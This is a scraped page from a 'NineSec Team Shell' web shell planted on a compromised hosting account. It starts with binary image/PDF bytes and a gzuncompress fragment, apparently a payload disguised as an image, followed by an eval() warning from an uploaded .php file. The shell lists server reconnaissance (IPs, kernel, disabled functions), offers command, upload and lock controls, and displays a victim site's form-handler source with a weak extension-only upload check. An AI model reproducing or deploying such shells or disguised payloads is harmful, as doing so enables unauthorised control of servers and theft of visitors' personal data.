JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 C  %PDF-1.3 % 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream x\mo7 a?Hyi{$E(i?ckrAvEzFHI|H?{|Z|X|Ň77?Oݞ__lOя77wx'?Ű8I] gQB2za]l|ɇ՟?} " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress
Warning: file_get_contents(test.txt): Failed to open stream: No such file or directory in /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/1770357389_0_197006009.php(44) : eval()'d code on line 6
NineSec Team Shell
NineSec Team Shell
Server IP : 82.25.113.252  /  Your IP : 216.73.216.172
Web Server : LiteSpeed
System : Linux fr-int-web2058.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u178500310 ( 178500310)
PHP Version : 8.2.29
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u178500310/domains/pinkrosesentertainment.com/public_html/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/u178500310/domains/pinkrosesentertainment.com/public_html/submit.php
<?php
include 'db_connect.php'; // ✅ Use your existing DB connection

// Ensure form submitted via POST
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['submit'])) {

    $input = $_POST['input'];

    // Sanitize all inputs
    $type = $conn->real_escape_string($input['type'] ?? 'Miss Registration');
    $enquiry_for = $conn->real_escape_string($input['enquiry_for']);
    $name = $conn->real_escape_string($input['name']);
    $email = $conn->real_escape_string($input['email']);
    $contact_number = $conn->real_escape_string($input['contact_number']);
    $dob = $conn->real_escape_string($input['Date_of_Birth']);
    $address = $conn->real_escape_string($input['address']);
    $city = $conn->real_escape_string($input['city']);
    $state = $conn->real_escape_string($input['state']);
    $country = $conn->real_escape_string($input['country']);
    $qualification = $conn->real_escape_string($input['qualification']);
    $profession = $conn->real_escape_string($input['profession']);

    // Upload function
    function handleFileUpload($fieldname, $folder = "uploads/")
    {
        if (!isset($_FILES[$fieldname]) || $_FILES[$fieldname]['error'] !== UPLOAD_ERR_OK) {
            return null;
        }

        $file = $_FILES[$fieldname];
        if ($file['size'] > 1024 * 1024) { // 1MB limit
            die("Error: File {$fieldname} exceeds 1MB.");
        }

        $ext = pathinfo($file['name'], PATHINFO_EXTENSION);
        $allowed = ['jpg', 'jpeg', 'png', 'gif'];
        if (!in_array(strtolower($ext), $allowed)) {
            die("Error: Invalid file type for {$fieldname}.");
        }

        $filename = uniqid() . "_" . basename($file['name']);
        $targetPath = $folder . $filename;

        if (!is_dir($folder)) {
            mkdir($folder, 0777, true);
        }

        if (!move_uploaded_file($file['tmp_name'], $targetPath)) {
            die("Error: Failed to upload {$fieldname}.");
        }

        return $targetPath;
    }

    // Upload files
    $photo1 = handleFileUpload('attachment');
    $photo2 = handleFileUpload('attachment2');

    if (!$photo1) {
        die("First photo is required and must be valid.");
    }

    // Prepare SQL insert
    $stmt = $conn->prepare("INSERT INTO registrations 
        (type, enquiry_for, name, email, contact_number, dob, address, city, state, country, qualification, profession, photo1, photo2)
        VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)");

    $stmt->bind_param(
        "ssssssssssssss",
        $type,
        $enquiry_for,
        $name,
        $email,
        $contact_number,
        $dob,
        $address,
        $city,
        $state,
        $country,
        $qualification,
        $profession,
        $photo1,
        $photo2
    );

    if ($stmt->execute()) {
        echo "<h2 style='color:green;'>✔ Registration successful!</h2>";
        header("Location: registration.php?success=1");
    } else {
        echo "<h2 style='color:red;'>❌ Error: " . $stmt->error . "</h2>";
    }

    $stmt->close();
    $conn->close();
} else {
    echo "No form submission detected.";
}

NineSec Team - 2022